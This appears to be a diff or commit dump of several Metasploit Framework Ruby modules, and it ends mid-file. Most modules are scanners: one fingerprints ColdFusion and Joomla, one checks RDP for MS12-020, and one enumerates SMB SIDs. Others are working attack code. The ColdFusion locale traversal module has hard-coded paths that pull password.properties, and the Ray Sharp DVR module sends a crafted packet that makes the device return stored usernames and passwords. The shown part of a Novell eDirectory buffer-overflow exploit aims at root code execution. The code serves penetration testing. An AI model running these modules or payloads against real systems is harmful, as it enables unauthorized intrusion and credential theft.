disconnect

11
modules/auxiliary/scanner/http/cold_fusion_version.rb
View File

@ -36,11 +36,10 @@ class Metasploit3 < Msf::Auxiliary
end
end
len = (response.body.length > 2500) ? 2500 : response.body.length
return nil if response.body.length < 100
title = "Not Found"
if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/im)
title = $1
title.gsub!(/\s/, '')
end
@ -51,9 +50,11 @@ class Metasploit3 < Msf::Auxiliary
if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
v = $1
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995\-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
out = "Adobe ColdFusion MX7"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2006 Adobe/)
out = "Adobe ColdFusion 8"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ or
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
out = "Adobe ColdFusion 9"
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
@ -77,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
}, 5)
})
return if not res or not res.body or not res.code
res.body.gsub!(/[\r|\n]/, ' ')

137
modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb
View File

@ -29,8 +29,12 @@ class Metasploit3 < Msf::Auxiliary
to have directory traversal protections in place, subsequently this module does NOT
work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or
ColdFusion 7.
It is not recommended to set FILE when doing scans across a group of servers where the OS
may vary; otherwise, the file requested may not make sense for the OS
},
'Author' => [ 'CG' ],
'Author' => [ 'CG', 'nebulus' ],
'License' => MSF_LICENSE,
'References' =>
[
@ -45,17 +49,122 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URL', [ true, "URI Path", '/CFIDE/administrator/enter.cfm']),
OptString.new('PATH', [ true, "traversal and file", '../../../../../../../../../../ColdFusion8/lib/password.properties%00en']),
OptString.new('FILE', [ false, 'File to retrieve', '']),
OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false])
], self.class)
end
def fingerprint(response)
if(response.headers.has_key?('Server') )
if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
os = "Windows (#{response.headers['Server']})"
elsif(response.headers['Server'] =~ /Apache\//)
os = "Unix (#{response.headers['Server']})"
else
os = response.headers['Server']
end
end
return nil if response.body.length < 100
title = "Not Found"
response.body.gsub!(/[\r\n]/, '')
if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
title = $1
title.gsub!(/\s/, '')
end
return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
out = nil
if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
v = $1
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
out = "Adobe ColdFusion MX7"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
out = "Adobe ColdFusion 8"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
out = "Adobe ColdFusion 9"
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
out = $1.split(/,/)[0]
else
out = 'Unknown ColdFusion'
end
if(title.downcase == 'coldfusionadministrator')
out << " (administrator access)"
end
out << " (#{os})"
return out
end
def run_host(ip)
trav = datastore['FILE']
if(trav == '' or datastore['FINGERPINT'])
# the user did not specify what they wanted, fingerprint, go after password.properties
url = '/CFIDE/administrator/index.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
return if not res or not res.body or not res.code
if (res.code.to_i == 200)
out = fingerprint(res)
print_status("#{ip} #{out}") if out
return if (datastore['FINGERPRINT'])
if(out =~ /Windows/ and out =~ /MX6/)
trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en'
elsif(out =~ /Windows/ and out =~ /MX7/)
trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en'
elsif(out =~ /Windows/ and out =~ /ColdFusion 8/)
trav = '..\..\..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en'
elsif(out =~ /ColdFusion 9/)
print_status("#{ip} ColdFusion 9 is not vulnerable, skipping")
return
elsif(out =~ /Unix/ and out =~ /MX6/)
trav = '../../../../../../../../../../opt/coldfusionmx/lib/password.properties%00en'
elsif(out =~ /Unix/ and out =~ /MX7/)
trav = '../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en'
elsif(out =~ /Unix/ and out =~ /ColdFusion 8/)
trav = '../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en'
else
if(res.body =~ /Adobe/ and res.body =~ /ColdFusion/)
print_error("#{ip} Fingerprint failed, FILE not set...aborting")
else
return # probably just a web server
end
end
else
return # silent fail as it doesnt necessarily at this point have to be a CF server
end
end
# file specified or obtained via fingerprint
if(trav !~ /\.\.\/\.\.\// and trav !~ /\.\.\\\.\.\\/)
# file probably specified by user, make sure to add in actual traversal
trav = '../../../../../../../../../../' << trav << '%00en'
end
url = normalize_uri(datastore['URL'])
locale = "?locale="
trav = datastore['PATH']
urls = ["/CFIDE/administrator/enter.cfm", "/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm",
"/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/logging/settings.cfm"]
# "/CFIDE/install.cfm", haven't seen where this one works
out = '' # to keep output in synch with threads
urls.each do |url|
res = send_request_raw({
'uri' => url+locale+trav,
'method' => 'GET',
@ -64,21 +173,25 @@ class Metasploit3 < Msf::Auxiliary
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
},
}, -1)
})
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{url}")
elsif (res.code == 200)
#print_error("#{res.body}")#debug
print_status("URL: #{ip}#{url}")
if match = res.body.match(/\<title\>(.*)\<\/title\>/im);
print_status("URL: #{ip}#{url}#{locale}#{trav}")
if res.body.match(/\<title\>(.*)\<\/title\>/im)
fileout = $1
print_status("FILE OUTPUT:\n" + fileout + "\r\n")
else
''
if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/)
print_good("#{ip} FILE: #{fileout}")
break
end
end
else
''
next if (res.code == 500 or res.code == 404 or res.code == 302)
print_error("#{ip} #{res.inspect}")
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError

109
modules/auxiliary/scanner/http/joomla_pages.rb Executable file
View File

@ -0,0 +1,109 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Version Scanner',
'Description' => %q{
This module scans a Joomla install for common pages.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
pages = [
'robots.txt',
'administrator/index.php',
'admin/',
'index.php/using-joomla/extensions/components/users-component/registration-form',
'index.php/component/users/?view=registration',
'htaccess.txt'
]
vprint_status("#{peer} - Checking for interesting pages")
pages.each do |page|
scan_pages(tpath, page, ip)
end
end
def scan_pages(tpath, page, ip)
res = send_request_cgi({
'uri' => "#{tpath}#{page}",
'method' => 'GET',
})
return if not res or not res.body or not res.code
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code == 200)
note = "Page Found"
if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
note = "Administrator Login Page"
elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
note = "Registration Page"
end
print_good("#{peer} - #{note}: #{tpath}#{page}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_page',
:data => "#{note}: #{tpath}#{page}",
:update => :unique_data
)
elsif (res.code == 403)
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif (res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")
end
end
return
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return
end
end

175
modules/auxiliary/scanner/http/joomla_plugins.rb Executable file
View File

@ -0,0 +1,175 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Plugins Scanner',
'Description' => %q{
This module scans a Joomla install for plugins and potential
vulnerabilities.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
vprint_status("#{peer} - Checking for interesting plugins")
res = send_request_cgi({
'uri' => tpath,
'method' => 'GET'
})
return if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
File.open(datastore['PLUGINS'], 'rb').each_line do |line|
papp = line.chomp
plugin_search(tpath, papp, ip, res.body.size)
end
end
def plugin_search(tpath, papp, ip, osize)
res = send_request_cgi({
'uri' => "#{tpath}#{papp}",
'method' => 'GET'
})
return if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
nsize = res.body.size
if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
print_good("#{peer} - Plugin: #{tpath}#{papp} ")
report_note(
:host => ip,
:port => rport,
:proto => 'http',
:ntype => 'joomla_plugin',
:data => "#{tpath}#{papp}",
:update => :unique_data
)
if (papp =~/passwd/ and res.body =~/root/)
print_good("#{peer} - Vulnerability: Potential LFI")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the 'root' signature",
:risk => 1,
:confidence => 10,
:category => 'Local File Inclusion',
:description => "Joomla: Potential LFI at #{tpath}#{papp}",
:name => 'Local File Inclusion'
)
elsif (res.body =~/SQL syntax/)
print_good("#{peer} - Vulnerability: Potential SQL Injection")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the 'SQL syntax' signature",
:risk => 1,
:confidence => 10,
:category => 'SQL Injection',
:description => "Joomla: Potential SQLI at #{tpath}#{papp}",
:name => 'SQL Injection'
)
elsif (papp =~/>alert/ and res.body =~/>alert/)
print_good("#{peer} - Vulnerability: Potential XSS")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the '>alert' signature",
:risk => 1,
:confidence => 10,
:category => 'Cross Site Scripting',
:description => "Joomla: Potential XSS at #{tpath}#{papp}",
:name => 'Cross Site Scripting'
)
elsif (papp =~/com_/)
vars = papp.split('_')
pages = vars[1].gsub('/','')
res1 = send_request_cgi({
'uri' => "#{tpath}index.php?option=com_#{pages}",
'method' => 'GET'
})
if (res1.code == 200)
print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_page',
:data => "Page: #{tpath}index.php?option=com_#{pages}",
:update => :unique_data
)
else
vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response")
end
end
elsif (res.code == 403)
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} ip access to #{ip} (SSL Required)")
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif (res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
end
end
return
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return
end
end

174
modules/auxiliary/scanner/http/joomla_version.rb Executable file
View File

@ -0,0 +1,174 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Version Scanner',
'Description' => %q{
This module scans a Joomla install for information about the underlying
operating system and Joomla version.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def os_fingerprint(response)
if not response.headers.has_key?('Server')
return "Unkown OS (No Server Header)"
end
case response.headers['Server']
when /Win32/, /\(Windows/, /IIS/
os = "Windows"
when /Apache\//
os = "*Nix"
else
os = "Unknown Server Header Reporting: "+response.headers['Server']
end
return os
end
def fingerprint(response)
case response.body
when /<version.*\/?>(.+)<\/version\/?>/i
v = $1
out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/,
/MooTools\.More\=\{version\:\"1\.3\.0\.1\"/,
/en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/,
/en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/,
/20196 2011\-01\-09 02\:40\:25Z ian/
out = "1.6"
when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /,
/MooTools\.More\=\{version\:\"1\.3\.2\.1\"/,
/22183 2011\-09\-30 09\:04\:32Z infograf768/,
/21660 2011\-06\-23 13\:25\:32Z infograf768/
out = "1.7"
when /Joomla! 1.5/,
/MooTools\=\{version\:\'1\.12\'\}/,
/11391 2009\-01\-04 13\:35\:50Z ian/
out = "1.5"
when /Copyright \(C\) 2005 \- 2012 Open Source Matters/,
/MooTools.More\=\{version\:\"1\.4\.0\.1\"/
out = "2.5"
when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/
out = $1.split(/,/)[0]
when /(Copyright \(C\) 2005 - 200(6|7))/,
/47 2005\-09\-15 02\:55\:27Z rhuk/,
/423 2005\-10\-09 18\:23\:50Z stingrey/,
/1005 2005\-11\-13 17\:33\:59Z stingrey/,
/1570 2005\-12\-29 05\:53\:33Z eddieajau/,
/2368 2006\-02\-14 17\:40\:02Z stingrey/,
/4085 2006\-06\-21 16\:03\:54Z stingrey/,
/4756 2006\-08\-25 16\:07\:11Z stingrey/,
/5973 2006\-12\-11 01\:26\:33Z robs/,
/5975 2006\-12\-11 01\:26\:33Z robs/
out = "1.0"
else
out = 'Unknown Joomla'
end
return out
end
def check_file(tpath, file, ip)
res = send_request_cgi({
'uri' => "#{tpath}#{file}",
'method' => 'GET'
})
return :abort if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code == 200)
os = os_fingerprint(res)
out = fingerprint(res)
return false if not out
if(out =~ /Unknown Joomla/)
print_error("#{peer} - Unable to identify Joomla Version with #{file}")
return false
else
print_good("#{peer} - Joomla Version:#{out} from: #{file} ")
print_good("#{peer} - OS: #{os}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_version',
:data => out
)
return true
end
elsif (res.code == 403)
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif(res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
end
return :abort
end
return false
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return :abort
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return :abort
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return :abort
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
files = [
'language/en-GB/en-GB.xml',
'templates/system/css/system.css',
'media/system/js/mootools-more.js',
'language/en-GB/en-GB.ini',
'htaccess.txt',
'language/en-GB/en-GB.com_media.ini'
]
vprint_status("#{peer} - Checking Joomla version")
files.each do |file|
joomla_found = check_file(tpath, file, ip)
return if joomla_found == :abort
break if joomla_found
end
end
end

112
modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb Normal file
View File

@ -0,0 +1,112 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Ray Sharp DVR Password Retriever',
'Description' => %q{
This module takes advantage of a protocol design issue with the
Ray Sharp based DVR systems. It is possible to retrieve the username and
password through the TCP service running on port 9000. Other brands using
this platform and exposing the same issue may include Swann, Lorex,
Night Owl, Zmodo, URMET, and KGuard Security.
},
'Author' =>
[
'someluser', # Python script
'hdm' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ]
],
'License' => MSF_LICENSE
)
register_options( [ Opt::RPORT(9000) ], self.class)
end
def run_host(ip)
req =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" +
( "\x00" * 475 )
connect
sock.put(req)
buf = ""
begin
# Pull data until the socket closes or we time out
Timeout.timeout(15) do
loop do
res = sock.get_once(-1, 1)
buf << res if res
end
end
rescue ::Timeout::Error
rescue ::EOFError
end
disconnect
info = ""
mac = nil
ver = nil
creds = {}
buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred|
# Make sure the two passwords match
next unless cred[1] == cred[2]
creds[cred[0]] = cred[1]
end
if creds.keys.length > 0
creds.keys.sort.each do |user|
pass = creds[user]
report_auth_info({
:host => rhost,
:port => rport,
:sname => 'dvr',
:duplicate_ok => false,
:user => user,
:pass => pass
})
info << "(user='#{user}' pass='#{pass}') "
end
end
# Look for MAC address
if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi
mac = $1
end
# Look for version
if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m
ver = $1
end
info << "mac=#{mac} " if mac
info << "version=#{ver} " if ver
return unless (creds.keys.length > 0 or mac or ver)
report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info)
print_good("#{rhost}:#{rport} #{info}")
end
end

198
modules/auxiliary/scanner/rdp/ms12-020_check.rb Normal file
View File

@ -0,0 +1,198 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS12-020 Microsoft Remote Desktop Checker',
'Description' => %q{
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.
},
'References' =>
[
[ 'CVE', '2012-0002' ],
[ 'MSB', 'MS12-020' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ],
[ 'EDB', '18606' ],
[ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ]
],
'Author' =>
[
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
],
'License' => MSF_LICENSE,
))
register_options(
[
OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])
], self.class)
end
def checkRdp(packet)
# code to check if RDP is open or not
vprint_status("#{peer} - Verifying RDP Protocol")
begin
# send connection
sock.put(packet)
# read packet to see if its rdp
res = sock.recv(1024)
if res.unpack("H*").join == "0300000b06d00000123400"
return true
else
return false
end
rescue
print_error("could not connect to RHOST")
return false
end
end
def connectionRequest()
packet = '' +
"\x03\x00" + # TPKT Header version 03, reserved 0
"\x00\x0b" + # Length
"\x06" + # X.224 Data TPDU length
"\xe0" + # X.224 Type (Connection request)
"\x00\x00" + # dst reference
"\x00\x00" + # src reference
"\x00" # class and options
return packet
end
def report_goods
report_vuln(
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => 'The MS12-020 Checker',
:vuln => 'Confirmaiton that this host is vulnerable to MS12-020',
:refs => self.references,
:exploited_at => Time.now.utc
)
end
def connectInitial()
packet = '' +
"\x03\x00\x00\x65" + # TPKT Header
"\x02\xf0\x80" + # Data TPDU, EOT
"\x7f\x65\x5b" + # Connect-Initial
"\x04\x01\x01" + # callingDomainSelector
"\x04\x01\x01" + # callingDomainSelector
"\x01\x01\xff" + # upwardFlag
"\x30\x19" + # targetParams + size
"\x02\x01\x22" + # maxChannelIds
"\x02\x01\x20" + # maxUserIds
"\x02\x01\x00" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x02\xff\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x30\x18" + # minParams + size
"\x02\x01\x01" + # maxChannelIds
"\x02\x01\x01" + # maxUserIds
"\x02\x01\x01" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x01\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x30\x19" + # maxParams + size
"\x02\x01\xff" + # maxChannelIds
"\x02\x01\xff" + # maxUserIds
"\x02\x01\xff" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x02\xff\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x04\x00" # userData
return packet
end
def userRequest()
packet = '' +
"\x03\x00" + # header
"\x00\x08" + # length
"\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission)
"\x28" # PER encoded PDU contents
return packet
end
def channelRequestOne
packet = '' +
"\x03\x00\x00\x0c" +
"\x02\xf0\x80\x38" +
"\x00\x01\x03\xeb"
return packet
end
def channelRequestTwo
packet = '' +
"\x03\x00\x00\x0c" +
"\x02\xf0\x80\x38" +
"\x00\x02\x03\xeb"
return packet
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
begin
# open connection
connect()
rescue
return
end
# check if rdp is open
if checkRdp(connectionRequest)
# send connectInitial
sock.put(connectInitial)
# send userRequest
sock.put(userRequest)
user1_res = sock.recv(1024)
# send 2nd userRequest
sock.put(userRequest)
user2_res = sock.recv(1024)
# send channel request one
sock.put(channelRequestOne)
channel_one_res = sock.recv(1024)
if channel_one_res.unpack("H*").to_s[16..19] == '3e00'
# vulnerable
print_good("#{peer} - Vulnerable to MS12-020")
report_goods
# send ChannelRequestTwo - prevent bsod
sock.put(channelRequestTwo)
# report to the database
else
vprint_error("#{peer} - Not Vulnerable")
end
end
# close connection
disconnect()
end
end

19
modules/auxiliary/scanner/smb/smb_lookupsid.rb
View File

@ -24,12 +24,21 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Local User Enumeration (LookupSid)',
'Description' => 'Determine what local users exist via brute force SID lookups',
'Description' => 'Determine what users exist via brute force SID lookups.
This module can enumerate both local and domain accounts by setting
ACTION to either LOCAL or DOMAIN',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'DefaultOptions' =>
{
'DCERPC::fake_bind_multi' => false
}
},
'Actions' =>
[
['LOCAL', { 'Description' => 'Enumerate local accounts' } ],
['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ]
],
'DefaultAction' => 'LOCAL'
)
register_options(
@ -206,6 +215,8 @@ class Metasploit3 < Msf::Auxiliary
:groups => {}
}
target_sid = host_sid if action.name =~ /LOCAL/i
target_sid = domain_sid if action.name =~ /DOMAIN/i
# Brute force through a common RID range
500.upto(datastore['MaxRID'].to_i) do |rid|
@ -216,7 +227,7 @@ class Metasploit3 < Msf::Auxiliary
NDR.long(1) +
NDR.long(rand(0x10000000)) +
NDR.long(5) +
smb_pack_sid(host_sid) +
smb_pack_sid(target_sid) +
NDR.long(rid) +
NDR.long(0) +
NDR.long(0) +

133
modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb Normal file
View File

@ -0,0 +1,133 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell eDirectory 8 Buffer Overflow',
'Description' => %q{
This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The
vulnerability exists in the ndsd daemon, specifically in the NCP service, while
parsing a specially crafted Keyed Object Login request. It allows remote code
execution with root privileges.
},
'Author' =>
[
'David Klein', # Vulnerability Discovery
'Gary Nilson', # Exploit
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-0432'],
[ 'OSVDB', '88718'],
[ 'BID', '57038' ],
[ 'EDB', '24205' ],
[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ]
],
'DisclosureDate' => 'Dec 12 2012',
'Platform' => 'linux',
'Privileged' => true,
'Arch' => ARCH_X86,
'Payload' =>
{
},
'Targets' =>
[
[ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3',
{
'Ret' => 0x080a4697, # jmp esi from ndsd
'Offset' => 58
}
]
],
'DefaultTarget' => 0
))
register_options([Opt::RPORT(524),], self.class)
end
def check
connect
sock.put(connection_request)
res = sock.get
